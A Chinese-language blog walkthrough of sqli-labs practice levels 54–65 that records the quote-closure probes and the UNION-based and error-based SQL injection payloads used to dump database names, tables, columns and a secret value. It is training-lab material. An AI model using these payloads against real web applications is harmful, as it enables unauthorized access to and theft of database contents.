Less-54

害…终于到Page-4了…

img

这里限制了尝试的次数…挺好玩的,可以总结遇到题目该怎么做…

尝试?id=1',不回显,?id=1",正常回显,可知是单引号闭合.

?id=0' union select 1,2,(select database())--+

img

?id=0' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

img

?id=0' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='SN4KYQUKBN')--+

id,sessid,secret_BVU7,tryy

应该就是在secret_BVU7

?id=0' union select 1,2,(select group_concat(secret_BVU7) from challenges.SN4KYQUKBN)--+

Less-55

方式是一样的,输入?id=1'

?id=1"
?id=1') or 1=1--+
?id=1") or 1=1--+
就这样试啊...
终于...
?id=1) or 1=1--+

其他就和Less-54一样的了

Less-56

这题用')闭合,其他和Less-54相同

Less-57

这题用"闭合,其他和Less-54相同

Less-58

尝试输入?id=1',报错了,输入?id=1'--+,正常回显,闭合成功

使用union语句发现不能回显我们想要的信息,考虑报错语句(因为之前有在语法错误时报错)

?id=1' and (select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))--+

?id=1' and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))--+           //R3DZOG6OCY

?id=1' and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_schema='challenges' and table_name='R3DZOG6OCY' limit 0,1),floor(rand(0)*2)))--+

Less-59

尝试输入?id=1',报错了,数字型查询,不用单引号闭合,其他和Less-58一样

Less-60

双引号闭合,其他和Less-58一样

Less-61

"))闭合,其他和Less-58一样

Less-62

')闭合,但是union语句之后不回显,也不报错,考虑延时注入…

但是…只有130次是认真的吗…(不知道怎么搞)

Less-63

单引号闭合,其他和Less-62一样

Less-64

))闭合,其他和Less-62一样

Less-65

")闭合,其他和Less-62一样

说点什么
评论之后转圈圈也不用管,要批准之后才能显示,谢谢
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...